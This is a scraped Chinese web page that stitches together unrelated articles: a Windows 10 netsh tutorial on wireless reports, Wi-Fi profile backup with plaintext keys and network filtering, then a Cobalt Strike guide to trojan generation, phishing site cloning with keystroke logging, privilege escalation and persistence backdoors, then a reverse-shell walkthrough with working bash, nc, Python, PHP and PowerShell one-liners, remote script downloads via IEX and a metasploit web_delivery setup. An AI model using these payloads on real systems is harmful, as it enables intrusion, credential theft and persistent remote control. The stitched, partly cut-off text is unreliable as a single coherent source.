Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
Windows 10中,你可以通過netsh命令來生成無線網(wǎng)絡(luò)報(bào)告。如果你正飽受WLAN連接問題的困擾,那么分析無線網(wǎng)絡(luò)報(bào)告將有助于你定位問題并有針對(duì)性地解決問題。若你的WLAN連接沒有問題,那么了解你的計(jì)算機(jī)關(guān)于WLAN連接的情況的細(xì)節(jié)也未嘗不是一種有趣的體驗(yàn)。
在這篇文章中,IT之家將教大家如何生成無線網(wǎng)絡(luò)報(bào)告以及列舉無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息。
在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告
在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告的方法十分簡(jiǎn)單,我們只需要執(zhí)行一行命令。
我們可以通過Windows Powershell(推薦)或者命令提示符以管理員身份來執(zhí)行用于生成無線網(wǎng)絡(luò)報(bào)告的命令。
要在你的計(jì)算機(jī)中找到并以管理員身份運(yùn)行Windows Powershell,請(qǐng)將鼠標(biāo)光標(biāo)移至開始按鈕(默認(rèn)位于你計(jì)算機(jī)屏幕的左下角)上,單擊鼠標(biāo)右鍵,在彈出的菜單中選中“Windows Powershell(管理員)”,并以鼠標(biāo)左鍵單擊。
要在你的計(jì)算機(jī)中找到并以管理員身份運(yùn)行命令提示符,請(qǐng)以鼠標(biāo)左鍵單擊微軟小娜的搜索框,輸入并搜索關(guān)鍵字“CMD”,在搜索結(jié)果的“最佳匹配”項(xiàng)下,你可以找到命令提示符的入口。將鼠標(biāo)光標(biāo)置于命令提示符的圖標(biāo)上,單擊鼠標(biāo)右鍵,在彈出的菜單中選中“以管理員身份運(yùn)行”,并以鼠標(biāo)左鍵單擊。
在接下來的教程中,我們將以在Windows Powershell中演示執(zhí)行用于生成無線網(wǎng)絡(luò)報(bào)告的命令的過程。
在Windows Powershell中輸入(或粘貼)并執(zhí)行以下命令:
netsh wlan show wlanreport
如果一切順利,你將看到執(zhí)行結(jié)果如下:
通過Windows Powershell中顯示的命令結(jié)果可知,最終生成的無線網(wǎng)絡(luò)報(bào)告已經(jīng)被命名為“wlan-report-latest.html”并保存在以下目錄下:
C:\ProgramData\Microsoft\Windows\WlanReport\
如果你的Windows 10安裝在其他盤符,那么你可以在文件資源管理器的地址欄中輸入以下地址:
%ProgramData%\Microsoft\Windows\WlanReport
并按鍵盤上的回車鍵來導(dǎo)航到無線網(wǎng)絡(luò)報(bào)告被保存到的位置。
你可以使用任意的網(wǎng)頁瀏覽器來打開無線網(wǎng)絡(luò)報(bào)告,其中的內(nèi)容(局部)將如下圖所示:
接下來我們來看無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息。
無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息
WLAN摘要圖表
WLAN摘要圖表將以可視化圖表的形式顯示報(bào)告中的WLAN連接會(huì)話信息。它的縱軸分別為WLAN、NCSI和NDIS項(xiàng),橫軸則是時(shí)間線,在WLAN摘要圖表中,你最需要關(guān)注的關(guān)鍵信息是錯(cuò)誤信息,若時(shí)間線中出現(xiàn)紅色的中間帶有“X”標(biāo)志的圓點(diǎn),則表明當(dāng)前(時(shí)間軸所處的)時(shí)間該點(diǎn)所在的項(xiàng)發(fā)生了錯(cuò)誤。點(diǎn)擊表示某項(xiàng)發(fā)生了錯(cuò)誤的點(diǎn)則可以查看該條錯(cuò)誤所對(duì)應(yīng)的與WLAN會(huì)話相關(guān)聯(lián)事件。
報(bào)告信息
報(bào)告信息(Report Info)包含兩條關(guān)鍵信息,分別是無線網(wǎng)絡(luò)報(bào)告生成的時(shí)間(比如2018年01月17日14:34:16)和該報(bào)告包含的內(nèi)容橫跨了多長(zhǎng)時(shí)間(比如三天)。
一般系統(tǒng)信息
一般系統(tǒng)信息(General System Info)所包含的關(guān)鍵信息包括計(jì)算機(jī)名稱(比如ThinkCentre)、計(jì)算機(jī)制造商(比如聯(lián)想)、計(jì)算機(jī)型號(hào)(比如揚(yáng)天S710)、BIOS日期/版本(比如2013年05月16日/FJKT16AUS)、操作系統(tǒng)版本(比如17074.1000)以及你的系統(tǒng)是否加入了MDM。
用戶信息
用戶信息(User Info)主要包含三條關(guān)鍵信息,分別是用戶名(比如Lenovo)、用戶域(比如THINKCENTRE)和用戶DNS域(比如未知)。
網(wǎng)絡(luò)適配器
網(wǎng)絡(luò)適配器(Network Adapters)包含的關(guān)鍵信息有設(shè)備名(比如WAN Miniport (PPPOE))、即插即用ID(比如SWD\MSRRAS\MS_PPPOEMINIPORT)、GUID(比如{DC4D342D-BE68-41F3-8119-A0C9C7D1A164})、當(dāng)前驅(qū)動(dòng)程序的版本(比如10.0.17074.1000)、驅(qū)動(dòng)程序日期(比如6-21-2006)DevNode標(biāo)志(比如0x180200a)等。
如果你的計(jì)算機(jī)的網(wǎng)絡(luò)適配器有問題,那么該網(wǎng)絡(luò)適配器的問題編號(hào)將列于網(wǎng)絡(luò)適配器的關(guān)鍵信息列表中。
腳本輸出
腳本輸出(Script Output)中主要包含三條命令(腳本)的執(zhí)行結(jié)果,下面我們一一列舉。
ipconfig /all
ipcpnfig /all腳本的執(zhí)行結(jié)果中包含的關(guān)鍵信息有當(dāng)前計(jì)算機(jī)中網(wǎng)絡(luò)適配器的MAC地址、IP地址和DNS服務(wù)器(若適用)等。
netsh wlan show all
netsh wlan show all腳本的執(zhí)行結(jié)果中包含的關(guān)鍵信息是當(dāng)前計(jì)算機(jī)中網(wǎng)絡(luò)適配器的詳情,包括適配器型號(hào)、適配器制造商、驅(qū)動(dòng)程序日期/版本、計(jì)算機(jī)中的WLAN配置文件、報(bào)告生成的過程中發(fā)現(xiàn)的WLAN網(wǎng)絡(luò)列表等。
certutil -store -silent My & certutil -store -silent -user My
certutil -store -silent My & certutil -store -silent -user My腳本的執(zhí)行結(jié)果包含的關(guān)鍵信息是當(dāng)前的計(jì)算機(jī)所安裝的證書的列表。
配置文件輸出
配置文件輸出的執(zhí)行結(jié)果中所包含的關(guān)鍵信息為當(dāng)前計(jì)算機(jī)中所有WLAN網(wǎng)絡(luò)的配置文件,WLAN網(wǎng)絡(luò)的密碼已經(jīng)經(jīng)過加密,不會(huì)以明文顯示。
摘要
摘要(Summary)中包含的關(guān)鍵信息有會(huì)話的成功/失敗情況(比如2次成功、0次失敗、0次警告)、斷開連接的原因(比如用戶主動(dòng)斷開連接)、會(huì)話的持續(xù)時(shí)間(比如360分鐘以上)、無線會(huì)話(與每個(gè)WLAN會(huì)話相關(guān)聯(lián)的所有WLAN事件,該列表中被設(shè)置了彩色背景的事件可與前文提到的WLAN摘要列表中的彩色的點(diǎn)相對(duì)應(yīng))等。
以上是在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告的方法和無線網(wǎng)絡(luò)報(bào)告中所包含的關(guān)鍵信息。
無線網(wǎng)絡(luò)報(bào)告是借由netsh命令生成的,事實(shí)上,netsh命令還可以用來做更多的事情。
使用netsh命令來備份和恢復(fù)無線網(wǎng)絡(luò)配置文件
無線網(wǎng)絡(luò)備份文件中包含的信息有無線網(wǎng)絡(luò)的SSID信息以及密碼信息。當(dāng)你的計(jì)算機(jī)重新安裝了操作系統(tǒng)時(shí),你可以借由無線網(wǎng)絡(luò)的備份文件快速地恢復(fù)無線網(wǎng)絡(luò)配置,這將有助于節(jié)省手動(dòng)輸入無線網(wǎng)絡(luò)密碼的時(shí)間或者等待無線網(wǎng)絡(luò)配置文件從云端恢復(fù)到本地計(jì)算機(jī)的時(shí)間。
要備份與恢復(fù)無線網(wǎng)絡(luò)配置文件十分簡(jiǎn)單,以小編的計(jì)算機(jī)為例,在開始備份無線網(wǎng)絡(luò)配置文件之前,我們最好先來查看當(dāng)前的計(jì)算機(jī)中存儲(chǔ)了哪些無線網(wǎng)絡(luò)配置文件。要查看當(dāng)前計(jì)算機(jī)中存儲(chǔ)的無線網(wǎng)絡(luò)配置文件,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:
netsh wlan show profiles
無線網(wǎng)絡(luò)配置文件列表將顯示如下:
要一次性備份當(dāng)前列表中所顯示的所有的無線網(wǎng)絡(luò)的配置文件,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以將無線網(wǎng)絡(luò)備份文件生成到E盤根目錄為例):
netsh wlan export profile key=clear folder=E:\
命令的執(zhí)行結(jié)果將如圖所示:
這時(shí),我們打開文件資源管理器,定位到E盤根目錄,將看到無線網(wǎng)絡(luò)配置文件備份如下:
若要備份指定無線網(wǎng)絡(luò)的配置文件(以備份無線網(wǎng)絡(luò)“Ruanmei”的配置文件為例),我們只需在WIndows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以將無線網(wǎng)絡(luò)備份文件生成到E盤根目錄為例):
netsh wlan export profile "Ruanmei" key=clear folder=E:\
命令的執(zhí)行結(jié)果將如圖所示:
若要借由備份文件恢復(fù)無線網(wǎng)絡(luò)配置到當(dāng)前用戶,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以恢復(fù)E盤根目錄中的無線網(wǎng)絡(luò)“Ruanmei”的配置文件“Wi-Fi-Ruanmei.xml”為例):
netsh wlan add profile filename="E:\Wi-Fi-Ruanmei.xml" user=current
命令的執(zhí)行結(jié)果將如圖所示:
若要借由備份文件恢復(fù)無線網(wǎng)絡(luò)配置到全部用戶,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以恢復(fù)E盤根目錄中的無線網(wǎng)絡(luò)“Ruanmei”的配置文件“Wi-Fi-Ruanmei.xml”為例):
netsh wlan add profile filename="E:\Wi-Fi-Ruanmei.xml" user=all
命令的執(zhí)行結(jié)果將如圖所示:
使用netsh命令來過濾無線網(wǎng)絡(luò)列表
若當(dāng)前地點(diǎn)有很多備選的無線網(wǎng)絡(luò),那么整個(gè)無線網(wǎng)絡(luò)列表看起來會(huì)非常雜亂。通過netsh命令,我們可以把列表中的指定無線網(wǎng)絡(luò)加入“白名單(只在無線網(wǎng)絡(luò)列表中顯示白名單中的無線網(wǎng)絡(luò))里”。
要將無線網(wǎng)絡(luò)(比如Ruanmei)加入到無線網(wǎng)絡(luò)列表的白名單,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:
netsh wlan add filter permission=allow ssid="Ruanmei" networktype=infrastructure
執(zhí)行結(jié)果將如下圖所示:
然后,我們?cè)賵?zhí)行以下命令來阻止白名單之外的無線網(wǎng)絡(luò)顯示在列表里:
netsh wlan add filter permission=denyall networktype=infrastructure
執(zhí)行結(jié)果將如下圖所示:
以下是執(zhí)行以上兩條命令前后的無線網(wǎng)絡(luò)列表對(duì)比:
執(zhí)行前
執(zhí)行后
若要還原無線網(wǎng)絡(luò)列表設(shè)置到此前的狀態(tài)(在無線網(wǎng)絡(luò)列表中顯示所有備選的無線網(wǎng)絡(luò)),我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:
netsh wlan delete filter permission=denyall networktype=infrastructure
執(zhí)行結(jié)果將如下圖所示:
以下是執(zhí)行以上命令前后的無線網(wǎng)絡(luò)列表對(duì)比:
執(zhí)行前
執(zhí)行后
好的,以上就是本期IT之家極客學(xué)院的全部?jī)?nèi)容,開開心心地玩兒去吧~
想看到更多這類內(nèi)容?去APP商店搜IT之家,天天都有小歡喜。
Cobalt Strike是一款基于java的內(nèi)網(wǎng)滲透測(cè)試神器,常被業(yè)界人稱為CS神器。自3.0以后已經(jīng)不在使用Metasploit框架而作為一個(gè)獨(dú)立的平臺(tái)使用,分為客戶端與服務(wù)端,服務(wù)端是一個(gè),客戶端可以有多個(gè),非常適合團(tuán)隊(duì)協(xié)同作戰(zhàn),多個(gè)攻擊者可以同時(shí)連接到一個(gè)團(tuán)隊(duì)服務(wù)器上,共享攻擊資源與目標(biāo)信息和sessions,可模擬APT做模擬對(duì)抗,進(jìn)行內(nèi)網(wǎng)滲透。 Cobalt Strike集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,socket代理,多模式端口監(jiān)聽,win exe木馬生成,win dll木馬生成,java木馬生成,office宏病毒生成,木馬捆綁;釣魚攻擊包括:站點(diǎn)克隆,目標(biāo)信息獲取,java執(zhí)行,瀏覽器自動(dòng)攻擊等等。
團(tuán)隊(duì)服務(wù)器最好運(yùn)行在Linux平臺(tái)上,服務(wù)端的關(guān)鍵文件是teamserver和cobaltstrike.jar,將這兩個(gè)文件放在同一目錄下運(yùn)行:
團(tuán)隊(duì)服務(wù)器默認(rèn)連接端口為50050,如果你想修改端口只需修改teamserver文件。
Linux:./cobaltstrike或 java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
Windows:雙擊cobaltstrike.exe
點(diǎn)擊Cobalt Strike -> Listeners->Add,其中內(nèi)置了八種監(jiān)聽器。
其中windows/beacon為內(nèi)置監(jiān)聽器,包括dns、http、https、smb、tcp、extc2六種方式的監(jiān)聽器;windows/foreign為外部監(jiān)聽器,配合Metasploit或者Armitage的監(jiān)聽器。
hta木馬是 http application的縮寫是一種獨(dú)立的程序跟c++寫的程序沒啥區(qū)別。可以被windows電腦的mshta命令直接執(zhí)行。可更改任意后綴名。點(diǎn)Attacks->Packages->HTML Application,選擇對(duì)應(yīng)的監(jiān)聽器,選擇powershell即可生成。
目標(biāo)主機(jī)訪問到木馬文件并執(zhí)行,返回CS就可以看到受害者上線。
目標(biāo)主機(jī)使用dos命令訪問到木馬文件并執(zhí)行,返回CS就可以看到受害者上線。
點(diǎn)擊Attacks->Packages->Windows Executable,選擇對(duì)應(yīng)的監(jiān)聽器,這里可生成(PowerShell,Raw,Windows EXE,Windows DLL(32-bit),Windows DLL(64-bit))選擇Windows EXE,點(diǎn)擊Generate生成,選擇生成的路徑及文件名保存即可。
將生成的exe文件投遞到目標(biāo)主機(jī),目標(biāo)主機(jī)運(yùn)行。
DLL是編譯好的代碼,與一般程序沒什么大差別,只是它不能獨(dú)立運(yùn)行,需要程序調(diào)用。DLL的代碼和其他程序幾乎沒什么兩樣,僅僅是接口和啟動(dòng)模式不同,只要改動(dòng)一下代碼入口,DLL就變成一個(gè)獨(dú)立的程序。
將生成的dll文件投遞到目標(biāo)主機(jī),目標(biāo)主機(jī)運(yùn)行。
DLL文件下載過程中對(duì)應(yīng)數(shù)據(jù)包
CS可以生成很多類型的shellcode,如c、c#、java、python、powershell、ruby、raw等
點(diǎn)擊Attacks->package->paylaod generator 這里以powershell為例。將生成的payload.ps1復(fù)制到目標(biāo)系統(tǒng)并執(zhí)行以
目前利用網(wǎng)絡(luò)防火墻將組織內(nèi)部的網(wǎng)絡(luò)結(jié)構(gòu)與外部網(wǎng)絡(luò)如 INTERNET 中有效地隔離開來,這種方法正變得逐漸流行起來。這些防火墻系統(tǒng)通常以應(yīng)用層網(wǎng)關(guān)的形式工作在網(wǎng)絡(luò)之間,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。SOCKS 提供一個(gè)通用框架來使這些協(xié)議安全透明地穿過防火墻。 說的簡(jiǎn)單明了一點(diǎn),在滲透測(cè)試中,我們使用socks技術(shù),可以穿透進(jìn)入目標(biāo)機(jī)的內(nèi)網(wǎng),從而擴(kuò)大我們的戰(zhàn)果
CobaltStrike自帶Socks功能,開啟Socks server 配置一個(gè)代理端口,成功開啟socks4后,即可 成功進(jìn)入目標(biāo)內(nèi)網(wǎng)。
開啟socks4代理,通過代理進(jìn)行內(nèi)網(wǎng)滲透 開啟socks,可以通過命令,也可以通過右鍵Pivoting->SOCKS Server
修改vim /etc/proxychains.conf ,在文件末尾添加socks4代理服務(wù)器
使用proxychains代理掃描內(nèi)網(wǎng)主機(jī)
我們還可以通過隧道將整個(gè)msf帶進(jìn)目標(biāo)內(nèi)網(wǎng) 點(diǎn)擊View->Proxy Pivots,選擇Socks4a Proxy,點(diǎn)擊Tunnel:
創(chuàng)建兩個(gè)監(jiān)聽器,一個(gè)使用windows/beacon_http/reverse_http來監(jiān)聽肉雞,另一個(gè)使用windows/foreign/reverse_http來將獲取到的控制權(quán)傳給msf(注意:這里的端口要與msf監(jiān)聽的端口一致)。
利用HTML Application來生成鏈接使得目標(biāo)設(shè)備上線,右擊選擇spwan,選擇msf監(jiān)聽器,點(diǎn)擊Choose,返回msf查看,成功獲取meterpreter會(huì)話(此方法獲取到的會(huì)話并不穩(wěn)定。)
點(diǎn)擊Attacks->Web Driver-by->Clone site,輸入想要克隆的網(wǎng)址,這里需要勾選上Log keystrokes來記錄輸入
當(dāng)受害者輸入了用戶名密碼,CS在日志里會(huì)有記錄
我們發(fā)現(xiàn)即使受害者輸入正確的賬號(hào)密碼系統(tǒng)也會(huì)提示用戶名密碼錯(cuò)誤,然后會(huì)自動(dòng)跳轉(zhuǎn)到正確的登錄界面,事實(shí)上我們還可以實(shí)現(xiàn)主動(dòng)跳轉(zhuǎn)到任意界面。 為了防止沒有主動(dòng)跳轉(zhuǎn)到正確的頁面我們可以選擇主動(dòng)跳轉(zhuǎn)到正確頁面 點(diǎn)擊 Attacks->Web Driver-by->System Profiler
點(diǎn)擊Cobalt Strike->Script Manager來導(dǎo)入elevate.cna 文件
選中目標(biāo)機(jī)器右擊選擇Access->Elevate,選擇相應(yīng)的漏洞即可提權(quán)
打開beacon shell并執(zhí)行命令
查看受害機(jī)器服務(wù),發(fā)現(xiàn)名為name的服務(wù)項(xiàng)創(chuàng)建成功
不過此時(shí)該服務(wù)啟動(dòng)類型為手動(dòng),我們需要將其設(shè)置為自動(dòng)
這樣一個(gè)service后門就設(shè)置成功了,即使目標(biāo)機(jī)器重啟后依舊可以拿到控制權(quán)限。
打開beacon shell并執(zhí)行命令
這樣一個(gè)注冊(cè)表自啟動(dòng)后門已經(jīng)設(shè)置成功了
通常我們對(duì)一個(gè)開啟了80端口的服務(wù)器進(jìn)行訪問時(shí),就會(huì)建立起與服務(wù)器Web服務(wù)鏈接,從而獲取到服務(wù)器相應(yīng)的Web服務(wù)。而反彈shell是我們開啟一個(gè)端口進(jìn)行監(jiān)聽,轉(zhuǎn)而讓服務(wù)器主動(dòng)反彈一個(gè)shell來連接我們的主機(jī),我們?cè)偻ㄟ^接收到的shell進(jìn)而來遠(yuǎn)程控制服務(wù)器。
Netcat由于他體積小且功能強(qiáng)大的特性,常常使用者被稱為“瑞士軍刀”或者ncat,在Debian、Mac系統(tǒng)中是默認(rèn)安裝的。想要在兩臺(tái)機(jī)器之間進(jìn)行正向、反向連接,Netcat通常是不二之選,反彈shell的使用中常用參數(shù)包括:
關(guān)于Netcatd的更多使用方法可參考:
https://www.freebuf.com/sectool/168661.html
實(shí)驗(yàn)環(huán)境:
Kali:192.168.178.131
CentOS 7:192.168.178.218
方法一:利用Linux命令
#反彈命令:
bash -i >/dev/tcp/192.168.178.131/23333 0>&1 2>&1
在系統(tǒng)文件中是不存在/dev/tcp這個(gè)文件的,它是一個(gè)特殊文件,打開這個(gè)文件就類似于發(fā)出了一個(gè)socket調(diào)用,建立一個(gè)socket連接,讀寫這個(gè)文件就相當(dāng)于在這個(gè)socket連接中傳輸數(shù)據(jù)。同理/dev/udp就是通過udp來進(jìn)行傳輸。
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
方法二:利用nc命令
#反彈命令:
nc -e /bin/bash 192.168.178.131 23333
(利用了nc的重定向功能)
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
方法三:利用腳本
1. Python
#反彈命令:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
2. php
(前提:需要在php.ini中放開危險(xiǎn)函數(shù)system,exec。可以通過php --ini來查詢php配置文件路徑,然后刪除配置文件中“disable_funtions”變量中對(duì)應(yīng)的函數(shù)名即可。)
(1) 反彈命令(代碼假設(shè)TCP連接的文件描述符為4,如果不行可以換成5或6):
php -r '$sock=fsockopen("192.168.178.131",23333);system("/bin/bash -i <&4 >&4 2>&4");'
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
(2) 反彈命令:
php -r ‘exec(“/bin/bash -i >& /dev/tcp/192.168.178.131/23333”);’
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
實(shí)驗(yàn)環(huán)境:
Kali:192.168.178.131
Windows server 2008:192.168.178.128
方法一:利用”nishang”攻擊框架
Nishang(https://github.com/samratashok/nishang )是一個(gè)基于PowerShell的攻擊框架,集合了一些PowerShell攻擊腳本和有效載荷,可反彈TCP/ UDP/ HTTP/HTTPS/ ICMP等類型shell。
1. 利用UDP反彈命令:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.178.131 -port 23333
#Kali進(jìn)行監(jiān)聽:
nc -lup 23333
2. 利用TCP反彈命令:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.178.131 -port 23333
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
方法二:利用powercat
powercat(https://github.com/besimorhino/powercat)為Powershell版的Netcat,實(shí)際上是一個(gè)powershell的函數(shù),使用方法類似Netcat。
#反彈命令:
powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.178.131 -p 23333 -e cmd
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
方法三:自定義powershell函數(shù)
#反彈命令:
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.178.131',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
#Kali進(jìn)行監(jiān)聽:
nc -lvp 23333
方法四:利用metasploit
利用metasploit的web_delivery模塊可通過python、php、powershell、regsvr32等進(jìn)行反彈shell。
#以powershell進(jìn)行反彈為例,kali執(zhí)行命令,可以看到生成已經(jīng)過編碼的payload:
msfconsole
use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set target 2
set LPORT 23333
set LHOST 192.168.178.131
Set srvhost 0.0.0.0
Set srvpost 8080
run
#Win server 2008執(zhí)行生成的命令“powershell.exe -nop -w hidden -e ......”(-w hidden參數(shù)使命令運(yùn)行時(shí)窗口隱藏)。
#Kali接收到反彈:
以上提到的是常見的反彈shell方式,當(dāng)然,還存在更多的其他方式,github上也有很多成熟的攻擊框架可以實(shí)現(xiàn)反彈shell,例如PowerSploit、Empire、Dnscat等等,感興趣可以繼續(xù)進(jìn)行深入學(xué)習(xí)。
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。